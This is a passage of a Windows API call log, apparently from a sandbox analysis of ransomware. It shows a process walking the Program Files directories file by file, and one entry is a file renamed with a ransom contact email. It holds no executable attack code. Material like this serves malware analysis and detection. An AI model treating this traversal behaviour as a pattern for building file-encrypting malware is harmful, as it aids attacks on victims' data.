cFileName="VSTO", cAlternateFileName="")) returned 0 [0178.835] FindClose (in: hFindFile=0x43a2cd8 | out: hFindFile=0x43a2cd8) returned 1 [0178.835] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0178.836] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c11068, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0178.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.836] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c5f95f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0178.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0178.837] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43854cb5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x43854cb5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x43854cb5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll", cAlternateFileName="")) returned 1 [0178.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.837] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d5a533, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d5a533, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d5a533, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DirectDB.dll", cAlternateFileName="")) returned 1 [0178.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.838] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d7f179, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="msadc", cAlternateFileName="")) returned 1 [0178.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0178.839] FindNextFileW (in: hFindFile=0x43a2f58, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41da7e83, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41da7e83, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41da7e83, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa9c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadce.dll", cAlternateFileName="")) returned 1 [0178.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.840] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d8186d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Ole DB", cAlternateFileName="OLEDB~1")) returned 1 [0178.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0178.840] FindNextFileW (in: hFindFile=0x43a2f58, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440870df, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440870df, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440870df, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x18600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaosp.dll", cAlternateFileName="")) returned 1 [0178.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.841] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440d35a9, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440d35a9, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440d35a9, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd0a00, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="wab32.dll", cAlternateFileName="")) returned 1 [0178.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.843] FindNextFileW (in: hFindFile=0x43a2d58, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c5f95f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 0 [0178.843] FindClose (in: hFindFile=0x43a2d58 | out: hFindFile=0x43a2d58) returned 1 [0178.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.843] FindNextFileW (in: hFindFile=0x43a2f18, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x330ca4b, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x330ca4b, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x330ca4b, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x19a, dwReserved0=0x0, dwReserved1=0x240000, cFileName="desktop.ini.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="DESKTO~1.BAT")) returned 1 [0179.379] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe530b7f4, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xe530b7f4, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.379] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0d83d92, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa21685bc, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0179.379] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43d5090 [0179.380] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\*", lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0d83d92, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa21685bc, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a2e98 [0179.380] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0d83d92, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa21685bc, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.380] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b2dfe94, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7f0f18af, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x68e10600, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hmmapi.dll.mui", cAlternateFileName="")) returned 1 [0179.380] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b3c4cb5, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7f0f18af, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x75fdf500, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ieinstal.exe.mui", cAlternateFileName="")) returned 1 [0179.381] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b2212c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7f0f18af, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x74ccc800, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="iexplore.exe.mui", cAlternateFileName="")) returned 1 [0179.381] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b2212c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7f0f18af, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x74ccc800, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="iexplore.exe.mui", cAlternateFileName="")) returned 0 [0179.381] FindClose (in: hFindFile=0x43a2e98 | out: hFindFile=0x43a2e98) returned 1 [0179.381] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0179.381] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a4ec31b, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a4ec31b, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a4ec31b, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExtExport.exe", cAlternateFileName="")) returned 1 [0179.381] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9b1003, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a9b1003, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a9b1003, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd400, dwReserved0=0x0, dwReserved1=0x0, cFileName="hmmapi.dll", cAlternateFileName="")) returned 1 [0179.381] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a49fe45, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a49fe45, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a49fe45, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="iediagcmd.exe", cAlternateFileName="")) returned 1 [0179.381] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a70c9a1, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xbc534b5e, ftLastAccessTime.dwHighDateTime=0x1d2fa09, ftLastWriteTime.dwLowDateTime=0x4a70c9a1, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x7a800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ieinstal.exe", cAlternateFileName="")) returned 1 [0179.382] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a49fe45, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a49fe45, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a49fe45, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x36c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ielowutil.exe", cAlternateFileName="")) returned 1 [0179.382] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a49fe45, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a49fe45, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a4c60b4, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x63800, dwReserved0=0x0, dwReserved1=0x0, cFileName="IEShims.dll", cAlternateFileName="")) returned 1 [0179.382] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa182b3a4, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa1c0b0e4, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x8ca44c00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xc9340, dwReserved0=0x0, dwReserved1=0x0, cFileName="iexplore.exe", cAlternateFileName="")) returned 1 [0179.382] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d846d9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a485593, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0179.382] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43d5090 [0179.382] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\images\\*", lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d846d9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a485593, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a2b98 [0179.382] FindNextFileW (in: hFindFile=0x43a2b98, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d846d9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a485593, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.382] FindNextFileW (in: hFindFile=0x43a2b98, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a55ea4d, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a55ea4d, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a55ea4d, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1536, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bing.ico", cAlternateFileName="")) returned 1 [0179.383] FindNextFileW (in: hFindFile=0x43a2b98, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a55ea4d, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a55ea4d, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a55ea4d, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1536, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bing.ico", cAlternateFileName="")) returned 0 [0179.383] FindClose (in: hFindFile=0x43a2b98 | out: hFindFile=0x43a2b98) returned 1 [0179.383] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0179.383] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2132d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb77a1634, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb77a1634, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SIGNUP", cAlternateFileName="")) returned 1 [0179.383] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43d5090 [0179.383] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\SIGNUP\\*", lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2132d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb77a1634, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb77a1634, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a2ad8 [0179.383] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2132d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb77a1634, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb77a1634, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.383] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30c952e, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x970b4468, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x970b4468, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="install.ins", cAlternateFileName="")) returned 1 [0179.383] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30c952e, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x970b4468, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x970b4468, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="install.ins", cAlternateFileName="")) returned 0 [0179.383] FindClose (in: hFindFile=0x43a2ad8 | out: hFindFile=0x43a2ad8) returned 1 [0179.383] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0179.383] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2de69a90, ftCreationTime.dwHighDateTime=0x1d48498, ftLastAccessTime.dwLowDateTime=0xf99f4140, ftLastAccessTime.dwHighDateTime=0x1d4bbb7, ftLastWriteTime.dwLowDateTime=0xf99f4140, ftLastWriteTime.dwHighDateTime=0x1d4bbb7, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="spray-roman.exe", cAlternateFileName="SPRAY-~1.EXE")) returned 1 [0179.384] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9b1003, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a9b1003, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a9b1003, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xc218, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0179.384] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9b1003, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a9b1003, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a9b1003, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xc218, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 0 [0179.384] FindClose (in: hFindFile=0x43a2fd8 | out: hFindFile=0x43a2fd8) returned 1 [0179.384] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0179.384] FindNextFileW (in: hFindFile=0x43a2f18, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa235ac5b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa235ac5b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Java", cAlternateFileName="")) returned 1 [0179.384] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x3c60950 [0179.384] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\*", lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa235ac5b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa235ac5b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x43a2fd8 [0179.384] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa235ac5b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa235ac5b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.384] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x339f800 | out: lpFindFileData=0x339f800*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xa235ac5b, 